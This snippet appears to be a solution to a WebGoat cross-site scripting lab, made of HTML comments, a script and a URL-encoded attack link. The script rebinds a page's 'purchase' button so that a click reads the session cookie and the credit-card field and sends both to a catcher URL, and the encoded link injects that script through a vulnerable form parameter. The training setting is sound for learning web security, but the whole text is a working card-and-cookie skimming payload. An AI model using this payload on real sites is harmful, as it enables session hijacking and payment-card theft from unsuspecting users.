<!-- Exploitable field: Enter your three digit access code -->
<!-- We set the onlick of purchase to steal the cc number, which will be in field2, and the cookie, which is already loaded on the page -->

<script>
    document.getElementsByName("purchase")[0].onclick = 
        function() {
            var xss_exploit = new Image();
            xss_exploit.src = "http://localhost:8090/WebGoat/catcher?PROPERTY=yes&cookie=" + document.cookie.split("=")[1] + "&credit=" + document.getElementsByName("field2")[0].value.replace(/\s+/g, '-');
        };
</script>

<!-- Encoded url-->
http://localhost:8090/WebGoat/start.mvc#attack/1406352188/900?field2=222&field1=%3Cscript%3E%0A%20%20%20%20document.getElementsByName(%22purchase%22)%5B0%5D.onclick%20%3D%20%0A%20%20%20%20%20%20%20%20function()%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xss_exploit%20%3D%20new%20Image()%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xss_exploit.src%20%3D%20%22http%3A%2F%2Flocalhost%3A8090%2FWebGoat%2Fcatcher%3FPROPERTY%3Dyes%26cookie%3D%22%20%2B%20document.cookie.split(%22%3D%22)%5B1%5D%20%2B%20%22%26credit%3D%22%20%2B%20document.getElementsByName(%22field2%22)%5B0%5D.value.replace(%2F%5Cs%2B%2Fg%2C%20%27-%27)%3B%0A%20%20%20%20%20%20%20%20%7D%3B%0A%3C%2Fscript%3E
